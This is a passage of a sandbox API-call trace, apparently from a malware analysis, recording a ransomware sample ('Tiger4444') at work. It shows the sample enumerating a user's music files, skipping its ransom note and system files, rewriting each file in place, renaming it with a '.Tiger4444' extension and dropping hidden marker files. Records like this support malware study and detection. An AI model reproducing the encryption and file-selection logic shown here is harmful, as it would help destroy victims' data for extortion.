[0046.055] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0046.055] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13750827280) returned 1 [0046.055] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0046.055] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0046.055] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.056] CloseHandle (hObject=0x2c8) returned 1 [0046.056] CloseHandle (hObject=0x260) returned 1 [0046.058] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\9oZvTZiqj1T2ND.wav.Tiger4444") returned 74 [0046.058] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\9oZvTZiqj1T2ND.wav" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nv_iq\\9ozvtziqj1t2nd.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\9oZvTZiqj1T2ND.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nv_iq\\9ozvtziqj1t2nd.wav.tiger4444"), dwFlags=0x1) returned 1 [0046.059] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=56720 | out: Addend=0xc6f980) returned 19772496 [0046.059] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4587 [0046.059] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe76cafe0, ftCreationTime.dwHighDateTime=0x1d4d2f4, ftLastAccessTime.dwLowDateTime=0x76579760, ftLastAccessTime.dwHighDateTime=0x1d4cf67, ftLastWriteTime.dwLowDateTime=0x76579760, ftLastWriteTime.dwHighDateTime=0x1d4cf67, nFileSizeHigh=0x0, nFileSizeLow=0x14972, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osWp2.mp3", cAlternateFileName="")) returned 1 [0046.059] lstrcmpiW (lpString1="osWp2.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.059] lstrcmpiW (lpString1="osWp2.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.059] lstrcmpiW (lpString1="osWp2.mp3", lpString2="Tiger4444.exe") returned -1 [0046.059] lstrcmpiW (lpString1="osWp2.mp3", lpString2=".") returned 1 [0046.059] lstrcmpiW (lpString1="osWp2.mp3", lpString2="..") returned 1 [0046.059] lstrcmpiW (lpString1="osWp2.mp3", lpString2="windows") returned -1 [0046.059] lstrcmpiW (lpString1="osWp2.mp3", lpString2="bootmgr") returned 1 [0046.060] lstrcmpiW (lpString1="osWp2.mp3", lpString2="pagefile.sys") returned -1 [0046.060] lstrcmpiW (lpString1="osWp2.mp3", lpString2="boot") returned 1 [0046.060] lstrcmpiW (lpString1="osWp2.mp3", lpString2="ids.txt") returned 1 [0046.060] lstrcmpiW (lpString1="osWp2.mp3", lpString2="NTUSER.DAT") returned 1 [0046.060] lstrcpyW (in: lpString1=0x30aeb04, lpString2="osWp2.mp3" | out: lpString1="osWp2.mp3") returned="osWp2.mp3" [0046.060] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\osWp2.mp3", dwFileAttributes=0x0) returned 1 [0046.060] lstrlenW (lpString="osWp2.mp3") returned 9 [0046.060] lstrlenW (lpString="Tiger4444") returned 9 [0046.060] lstrcmpiW (lpString1="osWp2.mp3", lpString2="Tiger4444") returned -1 [0046.060] lstrlenW (lpString=".dll") returned 4 [0046.060] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0046.060] lstrlenW (lpString=".lnk") returned 4 [0046.060] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0046.060] lstrlenW (lpString=".ini") returned 4 [0046.060] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0046.060] lstrlenW (lpString=".sys") returned 4 [0046.060] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0046.060] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\osWp2.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nv_iq\\oswp2.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.060] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.060] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13751346211) returned 1 [0046.060] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=84338) returned 1 [0046.060] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0046.060] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0046.061] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14c80, lpName=0x0) returned 0x2c8 [0046.061] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14c80) returned 0xbe0000 [0046.062] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.062] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0046.062] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.062] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0046.062] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.063] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0046.063] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.063] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0046.063] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13751596765) returned 1 [0046.063] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0046.063] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0046.063] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.064] CloseHandle (hObject=0x2c8) returned 1 [0046.064] CloseHandle (hObject=0x260) returned 1 [0046.066] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\osWp2.mp3.Tiger4444") returned 65 [0046.066] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\osWp2.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nv_iq\\oswp2.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\osWp2.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nv_iq\\oswp2.mp3.tiger4444"), dwFlags=0x1) returned 1 [0046.067] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=84352 | out: Addend=0xc6f980) returned 19829216 [0046.067] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4589 [0046.067] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ce0edd0, ftCreationTime.dwHighDateTime=0x1d4ce25, ftLastAccessTime.dwLowDateTime=0x848c4870, ftLastAccessTime.dwHighDateTime=0x1d4c897, ftLastWriteTime.dwLowDateTime=0x848c4870, ftLastWriteTime.dwHighDateTime=0x1d4c897, nFileSizeHigh=0x0, nFileSizeLow=0x184fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U_ga_WJrGJ-jDmjIG.wav", cAlternateFileName="U_GA_W~1.WAV")) returned 1 [0046.067] lstrcmpiW (lpString1="U_ga_WJrGJ-jDmjIG.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.067] lstrcmpiW (lpString1="U_ga_WJrGJ-jDmjIG.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.067] lstrcmpiW (lpString1="U_ga_WJrGJ-jDmjIG.wav", lpString2="Tiger4444.exe") returned 1 [0046.067] lstrcmpiW (lpString1="U_ga_WJrGJ-jDmjIG.wav", lpString2=".") returned 1 [0046.067] lstrcmpiW (lpString1="U_ga_WJrGJ-jDmjIG.wav", lpString2="..") returned 1 [0046.067] lstrcmpiW (lpString1="U_ga_WJrGJ-jDmjIG.wav", lpString2="windows") returned -1 [0046.067] lstrcmpiW (lpString1="U_ga_WJrGJ-jDmjIG.wav", lpString2="bootmgr") returned 1 [0046.067] lstrcmpiW (lpString1="U_ga_WJrGJ-jDmjIG.wav", lpString2="pagefile.sys") returned 1 [0046.067] lstrcmpiW (lpString1="U_ga_WJrGJ-jDmjIG.wav", lpString2="boot") returned 1 [0046.067] lstrcmpiW (lpString1="U_ga_WJrGJ-jDmjIG.wav", lpString2="ids.txt") returned 1 [0046.067] lstrcmpiW (lpString1="U_ga_WJrGJ-jDmjIG.wav", lpString2="NTUSER.DAT") returned 1 [0046.067] lstrcpyW (in: lpString1=0x30aeb04, lpString2="U_ga_WJrGJ-jDmjIG.wav" | out: lpString1="U_ga_WJrGJ-jDmjIG.wav") returned="U_ga_WJrGJ-jDmjIG.wav" [0046.067] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\U_ga_WJrGJ-jDmjIG.wav", dwFileAttributes=0x0) returned 1 [0046.067] lstrlenW (lpString="U_ga_WJrGJ-jDmjIG.wav") returned 21 [0046.067] lstrlenW (lpString="Tiger4444") returned 9 [0046.067] lstrcmpiW (lpString1="DmjIG.wav", lpString2="Tiger4444") returned -1 [0046.068] lstrlenW (lpString=".dll") returned 4 [0046.068] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0046.068] lstrlenW (lpString=".lnk") returned 4 [0046.068] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0046.068] lstrlenW (lpString=".ini") returned 4 [0046.068] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0046.068] lstrlenW (lpString=".sys") returned 4 [0046.068] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0046.068] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\U_ga_WJrGJ-jDmjIG.wav" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nv_iq\\u_ga_wjrgj-jdmjig.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.068] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.068] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13752096223) returned 1 [0046.068] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=99581) returned 1 [0046.068] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0046.068] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0046.068] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18800, lpName=0x0) returned 0x2c8 [0046.068] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18800) returned 0xbe0000 [0046.070] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.070] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0046.070] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.070] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0046.070] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.070] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0046.070] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.070] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0046.070] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13752354468) returned 1 [0046.070] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0046.071] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0046.071] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.072] CloseHandle (hObject=0x2c8) returned 1 [0046.072] CloseHandle (hObject=0x260) returned 1 [0046.074] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\U_ga_WJrGJ-jDmjIG.wav.Tiger4444") returned 77 [0046.074] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\U_ga_WJrGJ-jDmjIG.wav" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nv_iq\\u_ga_wjrgj-jdmjig.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\U_ga_WJrGJ-jDmjIG.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nv_iq\\u_ga_wjrgj-jdmjig.wav.tiger4444"), dwFlags=0x1) returned 1 [0046.075] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=99584 | out: Addend=0xc6f980) returned 19913568 [0046.075] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4591 [0046.075] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ce0edd0, ftCreationTime.dwHighDateTime=0x1d4ce25, ftLastAccessTime.dwLowDateTime=0x848c4870, ftLastAccessTime.dwHighDateTime=0x1d4c897, ftLastWriteTime.dwLowDateTime=0x848c4870, ftLastWriteTime.dwHighDateTime=0x1d4c897, nFileSizeHigh=0x0, nFileSizeLow=0x184fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U_ga_WJrGJ-jDmjIG.wav", cAlternateFileName="U_GA_W~1.WAV")) returned 0 [0046.075] FindClose (in: hFindFile=0xc73088 | out: hFindFile=0xc73088) returned 1 [0046.075] lstrcpyW (in: lpString1=0x30aeb04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.075] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nv_iq\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0046.075] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0046.075] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0046.076] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.076] CloseHandle (hObject=0x260) returned 1 [0046.076] CloseHandle (hObject=0x2ac) returned 1 [0046.077] GetCurrentThreadId () returned 0xfa8 [0046.077] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66448 [0046.077] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc" [0046.077] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5e610 | out: hHeap=0xc50000) returned 1 [0046.077] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66440 | out: hHeap=0xc50000) returned 1 [0046.077] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc" [0046.077] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\" [0046.077] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\.BFC0E91B00AE8A0620D3" [0046.077] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0046.078] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0046.081] FlushFileBuffers (hFile=0x2ac) returned 1 [0046.082] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.082] CloseHandle (hObject=0x2ac) returned 1 [0046.082] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc") returned 47 [0046.082] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.082] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7e8c440, ftCreationTime.dwHighDateTime=0x1d4c713, ftLastAccessTime.dwLowDateTime=0xc6e923c0, ftLastAccessTime.dwHighDateTime=0x1d4c9ad, ftLastWriteTime.dwLowDateTime=0x807c51cc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73108 [0046.083] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.083] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.083] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0046.083] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.083] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7e8c440, ftCreationTime.dwHighDateTime=0x1d4c713, ftLastAccessTime.dwLowDateTime=0xc6e923c0, ftLastAccessTime.dwHighDateTime=0x1d4c9ad, ftLastWriteTime.dwLowDateTime=0x807c51cc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.083] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.083] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.083] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0046.083] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.083] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.083] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x807c51cc, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x807c51cc, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x807c51cc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.083] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.083] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.083] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbea67320, ftCreationTime.dwHighDateTime=0x1d4cc4b, ftLastAccessTime.dwLowDateTime=0x36a414c0, ftLastAccessTime.dwHighDateTime=0x1d4cd8e, ftLastWriteTime.dwLowDateTime=0x36a414c0, ftLastWriteTime.dwHighDateTime=0x1d4cd8e, nFileSizeHigh=0x0, nFileSizeLow=0xe9f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fRm4zP.wav", cAlternateFileName="")) returned 1 [0046.083] lstrcmpiW (lpString1="fRm4zP.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.083] lstrcmpiW (lpString1="fRm4zP.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.083] lstrcmpiW (lpString1="fRm4zP.wav", lpString2="Tiger4444.exe") returned -1 [0046.083] lstrcmpiW (lpString1="fRm4zP.wav", lpString2=".") returned 1 [0046.083] lstrcmpiW (lpString1="fRm4zP.wav", lpString2="..") returned 1 [0046.083] lstrcmpiW (lpString1="fRm4zP.wav", lpString2="windows") returned -1 [0046.083] lstrcmpiW (lpString1="fRm4zP.wav", lpString2="bootmgr") returned 1 [0046.083] lstrcmpiW (lpString1="fRm4zP.wav", lpString2="pagefile.sys") returned -1 [0046.083] lstrcmpiW (lpString1="fRm4zP.wav", lpString2="boot") returned 1 [0046.083] lstrcmpiW (lpString1="fRm4zP.wav", lpString2="ids.txt") returned -1 [0046.083] lstrcmpiW (lpString1="fRm4zP.wav", lpString2="NTUSER.DAT") returned -1 [0046.083] lstrcpyW (in: lpString1=0x30aeb08, lpString2="fRm4zP.wav" | out: lpString1="fRm4zP.wav") returned="fRm4zP.wav" [0046.083] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\fRm4zP.wav", dwFileAttributes=0x0) returned 1 [0046.084] lstrlenW (lpString="fRm4zP.wav") returned 10 [0046.084] lstrlenW (lpString="Tiger4444") returned 9 [0046.084] lstrcmpiW (lpString1="Rm4zP.wav", lpString2="Tiger4444") returned -1 [0046.084] lstrlenW (lpString=".dll") returned 4 [0046.084] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0046.084] lstrlenW (lpString=".lnk") returned 4 [0046.084] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0046.084] lstrlenW (lpString=".ini") returned 4 [0046.084] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0046.084] lstrlenW (lpString=".sys") returned 4 [0046.084] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0046.084] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\fRm4zP.wav" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\frm4zp.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.084] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.084] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13753705003) returned 1 [0046.084] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=59896) returned 1 [0046.084] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0046.084] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc720c0 [0046.084] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xed00, lpName=0x0) returned 0x2c8 [0046.084] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xed00) returned 0xbe0000 [0046.086] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.086] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0046.086] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.086] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0046.086] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.086] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0046.086] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.086] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0046.086] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13753907664) returned 1 [0046.086] HeapFree (in: hHeap=0xc50000, 